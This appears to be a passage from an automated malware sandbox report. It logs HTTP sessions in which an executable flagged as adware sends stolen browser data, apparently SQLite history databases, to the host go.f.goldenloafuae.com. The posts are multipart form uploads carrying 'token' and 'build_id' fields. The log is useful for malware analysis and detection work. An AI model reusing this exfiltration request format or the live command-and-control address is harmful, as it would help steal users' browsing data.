                                                                                    2025-03-07 19:45:50 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 67 64 74 72 71 69 65 75 61 61 69 35 38 79 75 61 69 77 74 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 39 65 36 38 32 62 61 63 62 61 32 33 33 30 32 61 39 36 39 31 65 66 61 62 66 37 32 36 33 33 0d 0a 2d 2d 2d 2d 2d 2d 67 64 74 72 71 69 65 75 61 61 69 35 38 79 75 61 69 77 74 6a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 31 30 61 35 34 61 31 32 38 64 35 37 31 66 33 64 64 37 62 36 33 39 30 65 61 66 63 32 62 66 38 0d 0a 2d 2d 2d 2d 2d 2d 67 64 74 72 71 69 65 75 61 61 69 35 38 79 75 61 69 77 74 6a 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------gdtrqieuaai58yuaiwtjContent-Disposition: form-data; name="token"879e682bacba23302a9691efabf72633------gdtrqieuaai58yuaiwtjContent-Disposition: form-data; name="build_id"610a54a128d571f3dd7b6390eafc2bf8------gdtrqieuaai58yuaiwtjCont
                                                                                    2025-03-07 19:45:51 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Fri, 07 Mar 2025 19:45:51 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2025-03-07 19:45:51 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 2ok0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    17192.168.2.44975395.217.27.2524437696C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 19:45:54 UTC298OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----gl689hvkn7y5f3ohlny5
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                    Host: go.f.goldenloafuae.com
                                                                                    Content-Length: 169765
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2025-03-07 19:45:54 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 67 6c 36 38 39 68 76 6b 6e 37 79 35 66 33 6f 68 6c 6e 79 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 39 65 36 38 32 62 61 63 62 61 32 33 33 30 32 61 39 36 39 31 65 66 61 62 66 37 32 36 33 33 0d 0a 2d 2d 2d 2d 2d 2d 67 6c 36 38 39 68 76 6b 6e 37 79 35 66 33 6f 68 6c 6e 79 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 31 30 61 35 34 61 31 32 38 64 35 37 31 66 33 64 64 37 62 36 33 39 30 65 61 66 63 32 62 66 38 0d 0a 2d 2d 2d 2d 2d 2d 67 6c 36 38 39 68 76 6b 6e 37 79 35 66 33 6f 68 6c 6e 79 35 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------gl689hvkn7y5f3ohlny5Content-Disposition: form-data; name="token"879e682bacba23302a9691efabf72633------gl689hvkn7y5f3ohlny5Content-Disposition: form-data; name="build_id"610a54a128d571f3dd7b6390eafc2bf8------gl689hvkn7y5f3ohlny5Cont
                                                                                    2025-03-07 19:45:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:54 UTC16355OUTData Raw: 55 67 51 6b 39 50 54 45 56 42 54 69 42 45 52 55 5a 42 56 55 78 55 49 45 5a 42 54 46 4e 46 49 45 35 50 56 43 42 4f 56 55 78 4d 4b 56 41 45 42 68 63 72 4b 77 46 5a 64 47 46 69 62 47 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 56 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 46 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 4e 78 62 47 6c 30 5a 56 39 7a 5a 58 46 31 5a 57 35 6a 5a 53 68 75 59 57 31 6c 4c 48 4e 6c 63 53 6d 42 66 77 4d 48 46 78 55 56 41 59 4e 68 64 47 46 69 62 47 56 31 63 6d 78 7a 64 58 4a 73 63 77 52 44 55 6b 56 42 56 45 55 67 56 45 46 43 54 45 55 67 64 58 4a 73 63 79 68 70 5a 43 42 4a 54 6c 52 46 52 30 56 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 49 45 46 56 56 45 39 4a 54 6b 4e 53 52 55 31 46 54
                                                                                    Data Ascii: UgQk9PTEVBTiBERUZBVUxUIEZBTFNFIE5PVCBOVUxMKVAEBhcrKwFZdGFibGVzcWxpdGVfc2VxdWVuY2VzcWxpdGVfc2VxdWVuY2UFQ1JFQVRFIFRBQkxFIHNxbGl0ZV9zZXF1ZW5jZShuYW1lLHNlcSmBfwMHFxUVAYNhdGFibGV1cmxzdXJscwRDUkVBVEUgVEFCTEUgdXJscyhpZCBJTlRFR0VSIFBSSU1BUlkgS0VZIEFVVE9JTkNSRU1FT
                                                                                    2025-03-07 19:45:55 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Fri, 07 Mar 2025 19:45:55 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    18192.168.2.44975495.217.27.2524437696C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 19:45:54 UTC297OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----xlng4w479riw4ekfknop
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                    Host: go.f.goldenloafuae.com
                                                                                    Content-Length: 66001
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
                                                                                    2025-03-07 19:45:54 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 78 6c 6e 67 34 77 34 37 39 72 69 77 34 65 6b 66 6b 6e 6f 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 37 39 65 36 38 32 62 61 63 62 61 32 33 33 30 32 61 39 36 39 31 65 66 61 62 66 37 32 36 33 33 0d 0a 2d 2d 2d 2d 2d 2d 78 6c 6e 67 34 77 34 37 39 72 69 77 34 65 6b 66 6b 6e 6f 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 31 30 61 35 34 61 31 32 38 64 35 37 31 66 33 64 64 37 62 36 33 39 30 65 61 66 63 32 62 66 38 0d 0a 2d 2d 2d 2d 2d 2d 78 6c 6e 67 34 77 34 37 39 72 69 77 34 65 6b 66 6b 6e 6f 70 0d 0a 43 6f 6e 74
                                                                                    Data Ascii: ------xlng4w479riw4ekfknopContent-Disposition: form-data; name="token"879e682bacba23302a9691efabf72633------xlng4w479riw4ekfknopContent-Disposition: form-data; name="build_id"610a54a128d571f3dd7b6390eafc2bf8------xlng4w479riw4ekfknopCont
                                                                                    2025-03-07 19:45:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:54 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:54 UTC581OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                    2025-03-07 19:45:56 UTC158INHTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Fri, 07 Mar 2025 19:45:56 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    2025-03-07 19:45:56 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: 2ok0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    19192.168.2.44975595.217.27.2524437696C:\Users\user\Desktop\SecuriteInfo.com.Win32.AdwareX-gen.20631.18363.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2025-03-07 19:45:58 UTC298OUTPOST / HTTP/1.1
                                                                                    Content-Type: multipart/form-data; boundary=----u3ecjek6fcj58ycbsj58
                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/131.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                    Host: go.f.goldenloafuae.com
                                                                                    Content-Length: 153381
                                                                                    Connection: Keep-Alive
                                                                                    Cache-Control: no-cache
